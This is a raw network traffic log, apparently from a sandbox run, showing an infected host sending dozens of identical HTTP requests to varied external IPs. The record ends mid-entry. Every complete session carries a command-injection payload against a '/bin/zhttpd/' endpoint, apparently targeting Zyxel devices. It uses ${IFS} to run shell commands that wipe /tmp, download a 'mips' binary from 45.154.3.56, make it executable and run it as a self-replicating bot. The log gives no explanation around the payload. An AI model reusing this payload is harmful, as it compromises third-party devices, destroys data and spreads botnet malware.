                        Session IDSource IPSource PortDestination IPDestination Port
                        2687192.168.2.1452372114.13.201.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183130026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2688192.168.2.1433388167.131.203.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183155060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2689192.168.2.1446884174.6.101.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183213949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2690192.168.2.144746860.93.33.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183243990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2691192.168.2.1460368208.143.223.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183270931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2692192.168.2.1437124154.68.160.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183310032 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2693192.168.2.1460510222.165.179.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183365107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2694192.168.2.1458488182.239.42.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183434010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2695192.168.2.143528058.23.49.66443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183479071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2696192.168.2.145828886.208.58.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183522940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2697192.168.2.144432091.51.74.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183581114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2698192.168.2.143956860.173.61.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183615923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2699192.168.2.1446256128.17.193.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183645010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2700192.168.2.1436734106.19.57.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183703899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2701192.168.2.14521789.149.129.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183743000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2702192.168.2.1453908182.15.160.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183775902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2703192.168.2.1455376222.171.234.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183835030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2704192.168.2.1458036169.157.206.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183881998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2705192.168.2.1434082171.149.223.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183939934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2706192.168.2.1434828162.214.251.114443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183974028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2707192.168.2.1449910216.82.199.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184031010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2708192.168.2.145986440.89.249.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184062004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2709192.168.2.1459476158.115.199.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184107065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2710192.168.2.14446881.105.168.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184149027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2711192.168.2.1435136222.23.193.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184179068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2712192.168.2.1436788146.190.246.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184228897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2713192.168.2.1445788125.71.238.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184254885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2714192.168.2.1454678223.129.77.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184446096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2715192.168.2.1457178174.218.212.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184467077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2716192.168.2.145504482.140.197.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184467077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2717192.168.2.1443552102.94.253.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184467077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2718192.168.2.145467683.72.154.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184467077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2719192.168.2.145892849.147.239.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184477091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2720192.168.2.144268299.61.144.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184510946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2721192.168.2.146096858.194.126.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184571981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2722192.168.2.1460402185.77.207.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184636116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2723192.168.2.143595235.70.74.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184681892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2724192.168.2.1452086202.186.143.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184742928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2725192.168.2.1438362159.99.104.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184781075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2726192.168.2.145592053.185.45.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184828043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2727192.168.2.1450318110.111.33.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184885025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2728192.168.2.1453960186.174.159.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184889078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2729192.168.2.1445230157.171.61.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184947968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2730192.168.2.1440890116.192.157.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.184995890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2731192.168.2.1457964140.126.211.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185055017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2732192.168.2.1437210109.251.11.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185084105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2733192.168.2.1438246204.225.140.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185143948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2734192.168.2.143936483.29.22.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185184002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2735192.168.2.143839234.131.32.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185233116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2736192.168.2.1448478136.219.109.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185281992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2737192.168.2.14408185.251.248.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185322046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2738192.168.2.1446604149.16.18.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185362101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2739192.168.2.1434690123.180.219.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185424089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2740192.168.2.1443900217.120.67.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185450077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2741192.168.2.144113617.156.67.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185492039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2742192.168.2.1458226217.90.36.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185529947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2743192.168.2.1434428108.160.16.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185594082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2744192.168.2.146011242.7.24.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185628891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2745192.168.2.1454428126.181.254.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185683966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2746192.168.2.1443018201.29.13.66443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185705900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2747192.168.2.144615248.253.217.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185754061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2748192.168.2.1447314211.161.20.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185806990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2749192.168.2.1441610219.153.31.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185837030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2750192.168.2.1439488186.22.249.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185869932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2751192.168.2.144413898.219.214.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185909033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2752192.168.2.143320225.130.92.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185955048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2753192.168.2.144694659.249.14.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.185996056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2754192.168.2.1433932210.45.105.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186033964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2755192.168.2.144000292.51.131.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.186085939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2756192.168.2.1441602146.55.29.189443
                        TimestampBytes transferredDirectionData
